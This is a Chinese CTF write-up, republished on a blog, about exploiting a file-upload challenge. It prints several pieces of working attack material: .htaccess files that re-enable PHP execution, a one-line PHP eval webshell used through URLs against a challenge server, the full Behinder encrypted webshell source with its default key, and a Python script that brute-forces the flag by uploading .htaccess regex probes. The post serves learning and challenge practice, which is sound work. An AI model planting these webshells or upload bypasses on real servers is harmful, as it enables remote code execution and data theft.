前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >文件上传漏洞-通过ctf真题学习

文件上传漏洞-通过ctf真题学习

作者头像
亿人安全
发布2022-06-30 14:49:58
1.3K0
发布2022-06-30 14:49:58
举报
文章被收录于专栏:红蓝对抗

前言:最近在学习一些ctf的东西,所以自己想从一个小白的身份,复现一些web的漏洞。学习一些大佬的思路!

一、文件上传漏洞常规思路

1.首先这个是一道文件上传题,常规思路就是上传png、gif等进行bp抓包进行绕过限制

这里普及一下文件上传漏洞的知识。

文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。

常见web上传漏洞的解题手法大致分为白名单黑名单

常用工具:冰蝎、蚁剑、中国菜刀等等+php一句话木马。

文件上传靶机推荐:https://github.com/c0ny1/upload-labs

二.津门杯文件上传wp

方法1:

1.现在回到我们的题,我先使用php写入一句话木马,然后改为png格式,进行上传。

2.发现可以上传,但是没有解析。

查看页面源码,发现隐藏src

3.然后看看响应包,直接302了。说明注入和常规文件上传思路都没戏的!

4.然后从源码出发,看了看源码发现不能注入,也不能绕过上传。

5.然后看到了这个php规则。经过百度之后发现先知一位大佬写了:

<Directory ~ "/var/www/html/upload/[a-f0-9]{32}/">

php_flag engine off</Directory>

三、解题思路(1)

1.开始构造文件上传文件

2.新建.htaccess文件

第一个文件叫.htaccess内容是:<FilesMatch "1.png">SetHandler application/x-httpd-phpphp_flag engine on</FilesMatch>

3.新建1.png,进行文件上传

第二个文件名叫1.png<?php eval($_GET['cmd']);?>

4.先上传.htaccess文件,然后再上传.png文件,上传的png文件就会被解析了。

5.上传.htaccess文件

通过burp抓包看到

6.上传png文件

7.然后找到上传图片的路径

<img src="upload/e8be345643e019844763188240c38377/1.png">

8.读文件

http://122.112.248.222:20003/upload/e6a96d9444d3a938319f35616e5d1add/1.png

成功上传,解析

9.读phpinfo

http://122.112.248.222:20003/upload/e6a96d9444d3a938319f35616e5d1add/1.png?cmd=phpinfo();

10.扫目录

http://122.112.248.222:20003/upload/e6a96d9444d3a938319f35616e5d1add/1.png?cmd=var_dump(scandir(%22/%22));

11.http://122.112.248.222:20003/upload/e6a96d9444d3a938319f35616e5d1add/1.png?cmd=readfile(%22/flag%22);

方法2:

冰蝎:地址:https://github.com/rebeyond/Behinder

首先访问站点:http://122.112.248.222:20003/

真nm嚣张,干你走起

因为配置文件中使用<directory>禁止了upload沙盒解析,所以需要上传.htaccess,随便选择一个文件,通过Burp抓包修改参数如下

解释一下,将文件名和文件内容修改为.htaccess还不够,还需要将.htaccess放至站点目录之下

之后上传冰蝎马(当然期间还上传了一句话和大马)

直接连你,密码为rebeyond,成功getshell

在根目录下找到flag,flag为 flag{BNjmiWsBgTW4fsLoDgWLvgnfqk1CI3Nx}

冰蝎马如下

<?php

@error_reporting(0);

session_start();

    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond

$_SESSION['k']=$key;

session_write_close();

$post=file_get_contents("php://input");

if(!extension_loaded('openssl'))

{

$t="base64_"."decode";

$post=$t($post."");

for($i=0;$i<strlen($post);$i++) {

 $post[$i] = $post[$i]^$key[$i+1&15];

}

}

else

{

$post=openssl_decrypt($post, "AES128", $key);

}

    $arr=explode('|',$post);

    $func=$arr[0];

    $params=$arr[1];

class C{public function __invoke($p) {eval($p."");}}

    @call_user_func(new C(),$params);

?>

方法3:NulL大佬的脚本

<If "file('/flag')=~ /'''flag{xxxx'''/">

ErrorDocument 404 "wupco"

</If>

原理:匹配不到就返回404且有wupco这个字符串,直接脚本逐位爆破

import requests

import string

import hashlib

ip = requests.get('http://118.24.185.108/ip.php').text

print(ip)

def check(a):

    htaccess = '''

    <If "file('/flag')=~ /'''+a+'''/">

    ErrorDocument 404 "wupco"

    </If>

    '''

    resp = requests.post("http://122.112.248.222:20003/index.php?id=69660",data={'submit': 'submit'}, files={'file': ('.htaccess',htaccess)} )

    a = requests.get("http://122.112.248.222:20003/upload/"+ip+"/a").text

    if "wupco" not in a:

        return False

    else:

        return True

flag = "flag{BN"

c = string.ascii_letters + string.digits + "\{\}"

for j in range(32):

    for i in c:

        print("checking: "+ flag+i)

        if check(flag+i):

            flag = flag+i

            print(flag)

            break

        else:

            continue

总结:复现过程中遇到了一些自己从来没有遇到的问题。也碰到了很多没有接触过的知识,感谢在复现过程中提供思路的朋友。感觉到自己技术还有很多不足的地方,希望会的大佬跳过,大佬勿喷!我就是菜弟弟。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-05-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 亿人安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档